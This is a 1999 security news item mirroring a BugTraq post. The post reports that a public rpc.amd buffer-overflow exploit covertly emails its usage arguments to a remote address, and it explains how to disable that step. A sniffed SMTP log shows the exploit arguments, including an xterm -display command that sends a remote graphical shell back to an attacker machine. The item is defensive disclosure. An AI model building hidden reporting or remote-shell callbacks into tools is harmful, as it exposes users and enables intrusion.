Originally Published: Tuesday, 7 September 1999 Author: Quentin Cregan
Published to: news_enhance_security/Security News Page: 1/1 - [Printable]

amd exploit posts email to remote addresses

For all of those tried out the amd exploit... Guess what? It posts information about its usage to a remote source. Information about this can be found on BugTraq, and has been mirrored here.

   Page 1 of 1  

[from BugTraq]

Hello, Sorry if this was already known,

recently Someone named Taeho Oh published an exploit for a buffer overflow in rpc.amd (automount) While testing this exploit on my on server, i saw that i was opening a connection to ohhara.postech.ac.kr on port 25, After a little research i found out that The exploit (In it's original form) was sending an email to abuser@ohhara.postech.ac.kr and listing the arguments i just entered, There is an easy way to stop it from sending

Just comment the line: system(cmd);

Here's the log as i got it from sniffit: EHLO BlackMesa.com MAIL From: SIZE=95 RCPT To: DATA Received: (from root@localhost) by BlackMesa.com (8.9.3/8.9.3) id FAA01208 for abuser@ohhara.postech.ac.kr; Sat, 4 Sep 1999 05:30:56 +0200 Date: Sat, 4 Sep 1999 05:30:56 +0200 From: locke Message-Id: <199909040330.FAA01208@BlackMesa.com> To: abuser@ohhara.postech.ac.kr 10.0.0.9 /usr/X11R6/bin/xterm -display 10.0.0.8:0 . QUIT QUIT

(Ip's changed to protect the innocent) Bye





   Page 1 of 1